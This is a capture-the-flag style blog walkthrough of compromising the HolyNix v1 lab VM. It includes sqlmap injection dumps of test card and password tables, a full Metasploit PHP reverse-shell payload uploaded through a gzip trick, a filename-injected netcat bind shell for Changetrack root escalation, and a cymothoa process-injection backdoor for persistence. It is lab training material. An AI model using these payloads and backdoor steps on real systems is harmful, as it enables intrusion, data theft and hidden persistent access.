Ngabuburit With HolyNix V.1

OK, today I’m trying to playin’ around with HolyNix V.1 while waiting for fasting break time. You may refer to my previous post, on where to get the HolyNix. You may also find a bunch of walk-through / help / cheat or whatever you name it, on how to solve the challenge on Google. But I prefer to solve it by myself. It’s hell a lot of more phun to solve it by yourself then reading another person walk-through. So what do we need in here? 1. Vmware-player 2. Backtrack 5 3. Brain and a strong desire to finish the challenge.

First thing to do, run the extracted vmware image wth vmware player. Next I check my vmware network address to determine the HolyNix network address. With using ifconfig command, I had this result.
lo        Link encap:Local Loopback
inet addr:127.0.0.1  Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING  MTU:16436  Metric:1
RX packets:194059 errors:0 dropped:0 overruns:0 frame:0
TX packets:194059 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:137227867 (137.2 MB)  TX bytes:137227867 (137.2 MB)</span>

vmnet1    Link encap:Ethernet  HWaddr 00:50:56:c0:00:01
net addr:<strong>192.168.53.1  Bcast:192.168.53.255
inet6 addr: fe80::250:56ff:fec0:1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:93028 errors:0 dropped:0 overruns:0 frame:0
TX packets:96619 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

vmnet8    Link encap:Ethernet  HWaddr 00:50:56:c0:00:08
inet addr:172.16.4.1  Bcast:172.16.4.255  Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fec0:8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:1 errors:0 dropped:0 overruns:0 frame:0
TX packets:515 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Ok, now I fire up my nmap , and try to scan the network, since the system runs two virtual network for vmware, I start to scan from the vmnet1. Using nmap I just simply run

root@bt:/# nmap 192.168.53.1/24

Starting Nmap 5.51 ( http://nmap.org ) at 2011-08-22 15:46 WIT
Nmap scan report for 192.168.53.1
Host is up (0.000023s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
8080/tcp open  http-proxy

Nmap scan report for 192.168.53.129
Host is up (0.0016s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:BC:05:DE (VMware)

Nmap scan report for 192.168.53.254
Host is up (0.00011s latency).
All 1000 scanned ports on 192.168.53.254 are filtered
MAC Address: 00:50:56:E4:DA:28 (VMware)

Nmap done: 256 IP addresses (3 hosts up) scanned in 14.29 seconds

Nice, now I know that HolyNix runs on 192.168.53.129. And obviously it runs a web server. I need more information about this server, so I run nmap once again with some prefix on it

nmap -T4 -A -v 192.168.53.129</span></span>Starting Nmap 5.51 ( http://nmap.org ) at 2011-08-22 15:52 WIT
NSE: Loaded 57 scripts for scanning.
Initiating ARP Ping Scan at 15:52
Scanning 192.168.53.129 [1 port]
Completed ARP Ping Scan at 15:52, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:52
Completed Parallel DNS resolution of 1 host. at 15:52, 0.02s elapsed
Initiating SYN Stealth Scan at 15:52
Scanning 192.168.53.129 [1000 ports]
Discovered open port 80/tcp on 192.168.53.129
Completed SYN Stealth Scan at 15:52, 0.10s elapsed (1000 total ports)
Initiating Service scan at 15:52
Scanning 1 service on 192.168.53.129
Completed Service scan at 15:52, 6.02s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.53.129
NSE: Script scanning 192.168.53.129.
Initiating NSE at 15:52
Completed NSE at 15:52, 0.03s elapsed
Nmap scan report for 192.168.53.129
Host is up (0.00060s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
<strong>80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)</strong>
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
MAC Address: 00:0C:29:BC:05:DE (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.24 - 2.6.25
Uptime guess: 0.181 days (since Mon Aug 22 11:31:40 2011)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zerosTRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms 192.168.53.129

Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
Raw packets sent: 1023 (46.424KB) | Rcvd: 1023 (42.564KB)

Well, from the information we know that it runs Apache server with PHP+Suhosin Patch on it. Nice! Lets open the server with browser, and see what information we could get from it.

Well, what we found here, a log in system with two inputs on it. Basically, a normal pen-tester will try to SQLi the input, so let’s have a try. I start it by put in ‘ char into both input box, and here what I got.

SQL Error:You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to
use near ''''' at line 1
SELECT * FROM accounts WHERE username=''' AND password='''

Great, now lets fire up sqlmap and see what we’ll get.

./sqlmap.py -u "http://192.168.53.129/index.php?page=login.php" --data "user_name=apassword=z&Submit_button=Submit" --dbs --risk=3 --level=5
[09:37:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[09:37:49] [INFO] fetching database names
[09:37:49] [INFO] read from file '/pentest/web/scanners/sqlmap/output/192.168.53.129/session': 4
[09:37:49] [INFO] the SQL query used returns 4 entries
[09:37:49] [INFO] read from file '/pentest/web/scanners/sqlmap/output/192.168.53.129/session': information_schema
[09:37:49] [INFO] read from file '/pentest/web/scanners/sqlmap/output/192.168.53.129/session': clients
[09:37:49] [INFO] read from file '/pentest/web/scanners/sqlmap/output/192.168.53.129/session': creds
[09:37:49] [INFO] read from file '/pentest/web/scanners/sqlmap/output/192.168.53.129/session': mysql
available databases [4]:
[*] clients
[*] creds
[*] information_schema
[*] mysql

HollyNix! It’s vulner against SQLi. OK let see what we could get from clients table.

./sqlmap.py -u "http://192.168.53.129/index.php?page=login.php" --data "user_name=apassword=z&Submit_button=Submit" -p password -D clients -T accounts  --dump --risk=3 --level=5
Database: clients
Table: accounts
[29 entries]
+--------------------------------------------+---------------------+-----+--------------------------------+--
| address                                    | CCN                 | cid | email                          | exp     | name     | phone        | surname    | type       |
+--------------------------------------------+---------------------+-----+--------------------------------+--
| 4562 Boundary St:Jacksonville, FL 32216    | 5392 7367 3484 0469 | 1   | BenjaminNLynch@example.org     | 8/2013  | Benjamin | 904-683-8817 | Lynch      | MasterCard |
| 147 Woodland Dr:Schaumburg, IL 60173       | 5453 6102 5739 0358 | 2   | MinervaJBerry@example.org      | 9/2015  | Minerva  | 708-977-4242 | Berry      | MasterCard |
| 2493 Khale St:Myrtle Beach, SC 29577       | 6011 4994 1010 5322 | 3   | LindseyLBowman@example.org     | 12/2011 | Lindsey  | 843-626-8781 | Bowman     | Discover   |
| 3991 Elliott St:Manchester, NH 03101       | 5416 8729 8148 9486 | 4   | JohnPHamblin@example.org       | 3/2013  | John     | 603-627-9587 | Hamblin    | MasterCard |
| 3920 Cherry Camp Rd:Chicago, IL 60620      | 4916 9278 0028 9828 | 5   | OdellJWalters@example.org      | 10/2014 | Odell    | 773-487-5353 | Walters    | Visa       |
| 1378 McDowell St:Columbia, TN 38401        | 4716 4682 6173 7726 | 6   | GaryMMichels@example.org       | 9/2012  | Gary     | 931-381-8814 | Michels    | Visa       |
| 3095 Fort St:Rocky Mount, NC 27801         | 4916 3448 1227 3800 | 7   | RichardMFowler@example.org     | 3/2012  | Richard  | 252-904-5011 | Fowler     | Visa       |
| 3599 Marigold Ln:Fort Lauderdale, FL 33311 | 5104 3306 6868 0320 | 8   | HarrySPineda@example.org       | 11/2012 | Harry    | 305-401-7394 | Pineda     | MasterCard |
| 2665 Timber Oak Dr:Lubbock, TX 79401       | 6011 6457 4242 8259 | 9   | RosemaryLCutshall@example.org  | 1/2012  | Rosemary | 806-200-5571 | Cutshall   | Discover   |
| 4305 Hickory St:Ogden, UT 84401            | 5537 6754 6591 0362 | 10  | MaryECox@example.org           | 5/2013  | Mary     | 801-710-0941 | Cox        | MasterCard |
| 3965 Willis Ave:Daytona Beach, FL 32114    | 4485 6129 3846 3674 | 11  | WinnieMFischer@example.org     | 12/2011 | Winnie   | 386-323-1724 | Fischer    | Visa       |
| 1707 Holden St:San Diego, CA 92103         | 5317 6906 5346 3401 | 12  | FelixDChagnon@example.org      | 1/2013  | Felix    | 619-214-0886 | Chagnon    | MasterCard |
| 1974 Kildeer Dr:Sunrise, FL 33323          | 5191 4153 2070 6524 | 13  | MariaFJones@example.org        | 2/2012  | Maria    | 754-244-8539 | Jones      | MasterCard |
| 1353 Red Bud Ln:Jersey City, NJ 07305      | 6011 3022 5072 3784 | 14  | WilliamGRichardson@example.org | 5/2012  | William  | 862-244-2784 | Richardson | Discover   |
| 4447 Poplar Ln:Hialeah, FL 33012           | 5542 3658 2948 1283 | 15  | RosellaJKendall@example.org    | 3/2013  | Rosella  | 305-504-4951 | Kendall    | MasterCard |
| 4250 Green Acres Rd:Norlina, NC 27563      | 5265 6251 8967 4594 | 16  | CarolannJThompson@example.org  | 11/2012 | Carolann | 252-456-9843 | Thompson   | MasterCard |
| 4011 Randall Dr:Kawaihae, HI 96743         | 4539 1845 7920 4698 | 17  | MarthaCFrost@example.org       | 5/2015  | Martha   | 808-880-6054 | Frost      | Visa       |
| 4253 Hummingbird Way:Cambridge, MA 02141   | 4539 1640 5255 9206 | 18  | ArthurRBailey@example.org      | 3/2012  | Arthur   | 781-994-7119 | Bailey     | Visa       |
| 2759 Hillview St:Cayce, SC 29033           | 5288 7897 3058 6856 | 19  | RhondaRBrown@example.org       | 10/2012 | Rhonda   | 803-794-7513 | Brown      | MasterCard |
| 967 Flinderation Rd:Burr Ridge, IL 61257   | 5576 0624 1325 2886 | 20  | MelvinRWhite@example.org       | 3/2014  | Melvin   | 708-399-3626 | White      | MasterCard |
| 2046 Masonic Dr:Billings, MT 59102         | 5436 9085 7922 0747 | 21  | SaraRPatton@example.org        | 11/2011 | Sara     | 406-630-4475 | Patton     | MasterCard |
| 3203 Quilly Ln:Columbus, OH 43215          | 4716 9173 5435 8725 | 22  | CarlaKWebb@example.org         | 12/2012 | Carla    | 614-499-2955 | Webb       | Visa       |
| 2121 Oakmound Rd:Chicago, IL 60603         | 4916 1431 9917 0062 | 23  | HaroldBWest@example.org        | 2/2014  | Harold   | 773-214-6846 | West       | Visa       |
| 4822 Veltri Dr:Tuntutuliak, AK 99680       | 4916 9129 4596 5953 | 24  | GeorginaEReeves@example.org    | 7/2015  | Georgina | 907-256-5473 | Reeves     | Visa       |
| 4104 Catherine Dr:Fargo, ND 58103          | 6011 6041 8232 5764 | 25  | SteveLStokes@example.org       | 11/2011 | Steve    | 701-238-6553 | Stokes     | Discover   |
| 2536 Public Works Dr:Chattanooga, TN 37408 | 4929 5329 4895 9608 | 26  | LenaKlein@example.org          | 9/2013  | Lena     | 423-313-8160 | Klein      | Visa       |
| 4970 Haven Ln:Lansing, MI 48933            | 4485 9777 7807 3283 | 27  | MichaelMahler@example.org      | 10/2014 | Michael  | 517-652-8204 | Mahler     | Visa       |
| 3160 Carolyns Circle:Dallas, TX 75212      | 5333 8067 9908 8205 | 28  | SandraNussbaum@example.org     | 4/2015  | Sandra   | 214-794-5803 | Nussbaum   | MasterCard |
| 4834 Freed Dr:Stockton, CA 95202           | 4716 1304 2847 6396 | 29  | JessicaDuerr@example.org       | 10/2012 | Jessica  | 209-679-1447 | Duerr      | Visa       |
+--------------------------------------------+---------------------+-----+--------------------------------+

WOW! it contains a tons of client’s cc number. Nice! Lets move forward to creds table, and see what we’ll get.

./sqlmap.py -u "http://192.168.53.129/index.php?page=login.php" --data "user_name=a&password=z&Submit_button=Submit" -p password -D creds -T accounts  --dump --risk=3 --level=5
Database: creds
Table: accounts
[11 entries]
+-----+--------------------+--------+------------+
| cid | password           | upload | username   |
+-----+--------------------+--------+------------+
| 1   | Ih@cK3dM1cR05oF7   | 0      | alamo      |
| 2   | P3n7@g0n0wN3d      | 1      | etenenbaum |
| 3   | d15cL0suR3Pr0J3c7  | 1      | gmckinnon  |
| 4   | Ik1Ll3dNiN@r315er  | 1      | hreiser    |
| 5   | p1@yIngW17hPh0n35  | 1      | jdraper    |
| 6   | @rR35t3D@716       | 1      | jjames     |
| 7   | m@k1nGb0o7L3g5     | 1      | jljohansen |
| 8   | wH@7ar37H3Fed5D01n | 1      | kpoulsen   |
| 9   | f@7H3r0FL1nUX      | 0      | ltorvalds  |
| 10  | n@5aHaSw0rM5       | 1      | mrbutler   |
| 11  | Myd@d51N7h3NSA     | 1      | rtmorris   |
+-----+--------------------+--------+------------+

Oh yeah! now, we have all the user login information, complete with their unencrypted password. Now lets try to test the user name and password on the login page. I choose alamo and etenenbaum, since they have different value on the upload field.

Ok, lets have some walk for while, check all the menu on the left side. Looks like this user doesn’t have the upload feature on it. So, from here we could know that the upload field on the db told us that whether the user has the ability of upload or not. Lets give a try on atenenbaum username

Great! now lets take a look at the uploaded file.

Forbidden
You don't have permission to access /~etenenbaum/holynix.png on this server.
____________________________________________________________________________________

Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch Server at 192.168.53.129 Port 80

Ops! looks like we don’t have access to read the file, seems that the file not chmod correctly. Let’s try another file, this time I will upload a gzip file, since there is a feature on the upload menu that will extract a gzip file automatically. Logically, the gzip will run by web server system, which the extracted file should be owned by web server and will be accessible trough the browser, since it was belong to the web server system.

As we thought, the system change the ownership of the file , rite’ after it extract the compressed file. Lets have a check, lets open

http://192.168.53.129/~etenenbaum/holynix2.png

And there you go the image file successfully accessed through the browser. It’s a good sign, now we could upload our PHP backdoor into the server. I will using Metasploit to generate the backdoor. Metasploit provide some php backdoor, from bind type to connect back type. (reverse TCP) I will choose meterpreter type, although it was build for Windows based system but Hey!, this is my hacking path, and I want to try it, so, get back! choose your own backdoor by yourself.
Lets fire up the msfconsole and generate a PHP backdoor from it.

       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary</span>
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf >

and here we go!

msf > use payload/php/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options
Module options (payload/php/meterpreter/reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

msf payload(reverse_tcp) > set LHOST 192.168.53.1
LHOST > 192.168.53.1
msf payload(reverse_tcp) > set LPORT 5050
LPORT > 5050
msf payload(reverse_tcp) > generate -t raw
#

error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '192.168.53.1';
$port = 5050;
if (FALSE !== strpos($ip, ":")) {
        # ipv6 requires brackets around the address
        $ip = "[". $ip ."]";
}
if (($f = 'stream_socket_client') &amp;&amp; is_callable($f)) {
        $s = $f("tcp://{$ip}:{$port}");
        $s_type = 'stream';
} elseif (($f = 'fsockopen') &amp;&amp; is_callable($f)) {
        $s = $f($ip, $port);
        $s_type = 'stream';
} elseif (($f = 'socket_create') &amp;&amp; is_callable($f)) {
		$s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
		$res = @socket_connect($s, $ip, $port);
		if (!$res) { die(); }
		$s_type = 'socket';
} else {
		die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) { 
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
		# We failed on the main socket.  There's no way to continue, so
		# bail
		die();
}

$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($b) <; $len) {
		switch ($s_type) { 
		case 'stream': $b .= fread($s, $len-strlen($b)); break;
		case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
		}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
msf payload(reverse_tcp) >

Just copy the PHP code into a file and save it into whatever name you want, in my case it would be temp.php and don’t forget to give ?> at the end of the code. So we already have a meterpreter backdoor which will connect into our IP address on port 5050. Next, lets gzip the file and upload into the server through the upload menu. On our side, run a listener from Metasploit.

msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.53.1
LHOST => 192.168.53.1
msf exploit(handler) > set LPORT 5050
LPORT => 5050
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.53.1:5050
[*] Starting the payload handler...

Now open the temp.php on the server through browser at http://192.168.53.129/~etenenbaum/temp.php
lets have a check on our msfconsole and see what happen

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.53.1:5050
[*] Starting the payload handler...
[*] Sending stage (31612 bytes) to 192.168.53.129
[*] Meterpreter session 1 opened (192.168.53.1:5050 -> 192.168.53.129:47191) at 2011-08-23 10:48:24 +0700

meterpreter > 

Nice! the meterpreter backdoor has already runs smoothly :), try to playin’ around for a while, type help for any command it has. So what next? I already tried to run many kernel exploit on it, from a to z, you name it, but all come with fail. So I once again re-check the system whether I could find any clue on it. OK, after searching for a while I got two possibly ways to get into the system, 1. Changetrack which has a bug on it and second one is Knockknock which usually used to connect into a system through port knocking. I tried to download the knockknock application from the link provide on the message board and install it on my system. Next thing, is read the manual file which provide on the installer folder.
Using the meterpreter backdoor, I tried to download the knockknock config from the server into my system, based on the documentation , the knockknock config file saved on the /etc/knockknock.d/profiles/

meterpreter > cd /etc/knockknock.d/profiles/
meterpreter > pwd
/etc/knockknock.d/profiles
meterpreter > ls

Listing: /etc/knockknock.d/profiles
===================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  alamo
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  etenenbaum
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  gmckinnon
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  hreiser
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  jdraper
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  jjames
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  jljohansen
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  kpoulsen
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  ltorvalds
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  mrbutler
40755/rwxr-xr-x  4096  dir   2010-11-09 09:55:26 +0700  rtmorris

meterpreter > ls alamo

Listing: alamo
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  25    fil   2010-11-09 09:55:45 +0700  cipher.key
100644/rw-r--r--  27    fil   2010-11-09 09:55:45 +0700  config
100644/rw-r--r--  2     fil   2010-11-09 11:12:55 +0700  counter
100644/rw-r--r--  25    fil   2010-11-09 09:55:45 +0700  mac.key

meterpreter >; download alamo/cipher.key >; /tmp
[*] downloading: alamo/cipher.key ->; /tmp
[*] downloaded : alamo/cipher.key ->; /tmp/alamo/cipher.key
[-] stdapi_fs_stat: Operation failed: 1
meterpreter >; download alamo/config >; /tmp
[*] downloading: alamo/config ->; /tmp
[*] downloaded : alamo/config ->; /tmp/alamo/config
[-] stdapi_fs_stat: Operation failed: 1
meterpreter >; download alamo/counter >; /tmp
[*] downloading: alamo/counter ->; /tmp
[*] downloaded : alamo/counter ->; /tmp/alamo/counter
[-] stdapi_fs_stat: Operation failed: 1
meterpreter >; download alamo/mac.key >; /tmp
[*] downloading: alamo/mac.key ->; /tmp
[*] downloaded : alamo/mac.key ->; /tmp/alamo/mac.key
[-] stdapi_fs_stat: Operation failed: 1
meterpreter >

Lets have a check on the /temp folder, and see whether we had successfully download the file. And yes, we already download the file into our system. Next put the file on the root folder and create a new knockknock client profile, just follow the instruction on the INSTALL file, I will not explain it on here. After settings the application, I try to run knockknock to have some access into the server through ssh port, start from alamo user. Using the password from our previous dump db.

root@bt:~/.knockknock# knockknock -p 22 192.168.53.129
*** Success: knock sent.
root@bt:~/.knockknock# ssh -l alamo 192.168.53.129
alamo@192.168.53.129's password:
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
alamo@holynix:~$

Nice! we successfully get into the server through ssh connection. Lets have some information

alamo@holynix:~$ id
uid=1000(alamo) gid=115(developers) groups=115(developers)
alamo@holynix:~$ ls -al /home/
total 56
drwxr-xr-x 14 root       root       4096 2010-11-08 21:53 .
drwxr-xr-x 21 root       root       4096 2010-11-08 21:09 ..
drwxr-xr-x  2 alamo      developers 4096 2010-11-08 21:47 alamo
drwxrwxr-x 20 nobody     developers 4096 2010-11-08 21:54 development
drwxr-xr-x  2 etenenbaum users      4096 2011-11-19 09:11 etenenbaum
drwxr-xr-x  2 gmckinnon  users      4096 2010-11-08 21:47 gmckinnon
drwxr-xr-x  2 hreiser    staff      4096 2010-11-08 21:47 hreiser
drwxr-xr-x  2 jdraper    users      4096 2010-11-08 21:47 jdraper
drwxr-xr-x  2 jjames     staff      4096 2010-11-08 21:47 jjames
drwxr-xr-x  2 jljohansen developers 4096 2010-11-08 21:47 jljohansen
drwxr-xr-x  2 kpoulsen   users      4096 2010-11-08 21:47 kpoulsen
drwxr-xr-x  3 ltorvalds  admin      4096 2011-11-18 13:25 ltorvalds
drwxr-xr-x  2 mrbutler   staff      4096 2010-11-08 21:47 mrbutler
drwxr-xr-x  2 rtmorris   users      4096 2010-11-08 21:47 rtmorris
alamo@holynix:~$

Ok, we got ace in here, lets wrap up everything, we already knew that Changetrack has a bug on it which will lead into privilege escalation, luckily user alamo has the same group with Changetrack, which access into the changetrack developer folder on /home/developer. Based on the report to, exploit Changetrack bug, we just need to create a file with a command

touch "<`nc -l -p 5001 -e $SHELL`"

and then run ls command on the folder. If the plan runs as expected, the command line will be executed and it will open a root shell prompt (hopefully). And next just connect to the system on that port. Don’t forget to do port knocking before connect trough nc.

root@bt:~# knockknock -p 5001 192.168.53.129
*** Success: knock sent.
root@bt:~# nc 192.168.53.129 5001
(UNKNOWN) [192.168.53.129] 5001 (?) : Connection refused
root@bt:~# knockknock -p 5001 192.168.53.129
*** Success: knock sent.
root@bt:~# nc 192.168.53.129 5001
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/root
uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux

0wn3d! Time to break the fasting… Oh wait, for more fun and real case scenario, I try to put some backdoor into the system, in case the admin knows that his system already compromise trough the Changetrack bug. I’m using cymothoa, you might find in on your BT 5, I just simplify copy the compiled (binary) file of cymothoa into /var/www folder, the I download it from the holynix

wget http://192.168.53.1/cymothoa
ls
cymothoa
holynix.sql
holynix.sql.1
ps ax
PID TTY      STAT   TIME COMMAND
1 ?        Ss     0:04 /sbin/init
2 ?        S&lt;     0:00 [kthreadd]
3 ?        S&lt;     0:00 [migration/0]
4 ?        S&lt;     0:00 [ksoftirqd/0]
5 ?        S&lt;     0:00 [watchdog/0]
6 ?        S&lt;     0:01 [events/0]
7 ?        S&lt;     0:00 [khelper]
41 ?        S&lt;     0:00 [kblockd/0]
44 ?        S&lt;     0:00 [kacpid]
45 ?        S&lt;     0:00 [kacpi_notify]
176 ?        S&lt;     0:00 [kseriod]
214 ?        S      0:00 [pdflush]
215 ?        S      0:00 [pdflush]
216 ?        S&lt;     0:00 [kswapd0]
258 ?        S&lt;     0:00 [aio/0]
1517 ?        S&lt;     0:00 [ksuspend_usbd]
1522 ?        S&lt;     0:00 [khubd]
1526 ?        S&lt;     0:00 [ata/0]
1531 ?        S&lt;     0:00 [ata_aux]
1626 ?        S&lt;     0:00 [scsi_eh_0]
1869 ?        S&lt;     0:00 [scsi_eh_1]
1871 ?        S&lt;     0:00 [scsi_eh_2]
2636 ?        S&lt;     0:04 [kjournald]
2796 ?        S
3081 ?        S&lt;     0:00 [kgameportd]
3252 ?        S&lt;     0:00 [kpsmoused]
4208 ?        S
4610 tty4     Ss+    0:00 /sbin/getty 38400 tty4
4613 tty5     Ss+    0:00 /sbin/getty 38400 tty5
4619 tty2     Ss+    0:00 /sbin/getty 38400 tty2
4622 tty3     Ss+    0:00 /sbin/getty 38400 tty3
4625 tty6     Ss+    0:00 /sbin/getty 38400 tty6
4659 ?        Ss     0:00 /sbin/syslogd -u syslog
4678 ?        S      0:01 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
4680 ?        Ss     0:00 /sbin/klogd -P /var/run/klogd/kmsg
4699 ?        Ss     0:00 /usr/sbin/sshd
4755 ?        S      0:00 /bin/sh /usr/bin/mysqld_safe
4797 ?        Sl     1:38 /usr/sbin/mysqld --basedir=/usr
--datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking
--port=3306 --socket=/var/run/mysqld/mysqld.sock
4798 ?        S      0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
4901 ?        S      1:01 /usr/bin/python /usr/bin/knockknock-daemon
4902 ?        S      0:00 /usr/bin/python /usr/bin/knockknock-daemon
4922 ?        Ss     0:00 /usr/sbin/atd
4933 ?        Ss     0:00 /usr/sbin/cron
4955 ?        Ss     0:05 /usr/sbin/apache2 -k start
4974 tty1     Ss+    0:00 /sbin/getty 38400 tty1
4975 ?        S      0:04 /usr/sbin/apache2 -k start
4977 ?        S      0:03 /usr/sbin/apache2 -k start
4978 ?        S      0:03 /usr/sbin/apache2 -k start
4979 ?        S      0:03 /usr/sbin/apache2 -k start
4981 ?        S      0:03 /usr/sbin/apache2 -k start
5584 ?        S      0:03 /usr/sbin/apache2 -k start
7402 ?        S      0:00 /usr/sbin/apache2 -k start
7403 ?        S      0:00 /usr/sbin/apache2 -k start
7404 ?        S      0:01 /usr/sbin/apache2 -k start
7405 ?        S      0:00 /usr/sbin/apache2 -k start
23643 ?        Z      0:00 [sh]
24856 ?        Ss     0:00 sshd: alamo [priv]
24858 ?        S      0:00 sshd: alamo@pts/0
24859 pts/0    Ss+    0:00 -bash
26707 ?        S      0:00 /USR/SBIN/CRON
26708 ?        Ss     0:00 /bin/sh -c /usr/local/bin/changetrack -q
26709 ?        S      0:00 /usr/bin/perl /usr/local/bin/changetrack -q
26714 ?        S      0:00 sh -c cp /home/development/&lt;`nc -l -p 5001
-e $SHELL` /var/lib/changetrack/home:development:&lt;`nc -l -p 5001 -e
$SHELL`
26715 ?        S      0:00 sh
26721 ?        S      0:00 /USR/SBIN/CRON
26722 ?        Ss     0:00 /bin/sh -c /usr/local/bin/changetrack -q
26723 ?        S      0:00 /usr/bin/perl /usr/local/bin/changetrack -q
26730 ?        Z      0:00 [cron]
26745 ?        S      0:00 sh -c cp /home/development/&lt;`nc -l -p 5001
-e $SHELL` /var/lib/changetrack/home:development:&lt;`nc -l -p 5001 -e
$SHELL`
26748 ?        S      0:00 nc -l -p 5001 -e /bin/sh
27381 ?        Z      0:00 [cron]
27384 ?        S      0:00 /USR/SBIN/CRON
27385 ?        Ss     0:00 /bin/sh -c /usr/local/bin/changetrack -q
27386 ?        S      0:00 /usr/bin/perl /usr/local/bin/changetrack -q
27391 ?        S      0:00 sh -c cp /home/development/&lt;`nc -l -p 5001
-e $SHELL` /var/lib/changetrack/home:development:&lt;`nc -l -p 5001 -e
$SHELL`
27393 ?        Z      0:00 [cron]
27394 ?        S      0:00 nc -l -p 5001 -e /bin/sh
27396 ?        R      0:00 ps ax
chmod +x cymothoa
./cymothoa -p 26708 -s 0 -y 6666
[+] attaching to process 26708</span>

register info:
-----------------------------------------------------------
eax value: 0xfffffe00   ebx value: 0xffffffff
esp value: 0xbf94de6c   eip value: 0xb7f8a410
------------------------------------------------------------

[+] new esp: 0xbf94de68
[+] injecting code into 0xb7f8b000
[+] copy general purpose registers
[+] detaching from 26708

[+] infected!!!

Nice! now open a terminal and connect to our backdoor on port 6666

root@bt:/pentest/backdoors/cymothoa# knockknock -p 6666 192.168.53.129
*** Success: knock sent.
root@bt:/pentest/backdoors/cymothoa# nc 192.168.53.129 6666
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/root

Remember to use SUID process (owned by root) or you will have only a normal user
shell when running (infect) cymothoa on a normal user process. Finish.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Spentera

We are specializing in penetration test, vulnerability assessment, computer forensics, as well as intrusion analyst and malware analysis. Customers can contact us directly at contact[at]spentera[dot]id, or use Contact Our Team menu on the sidebar.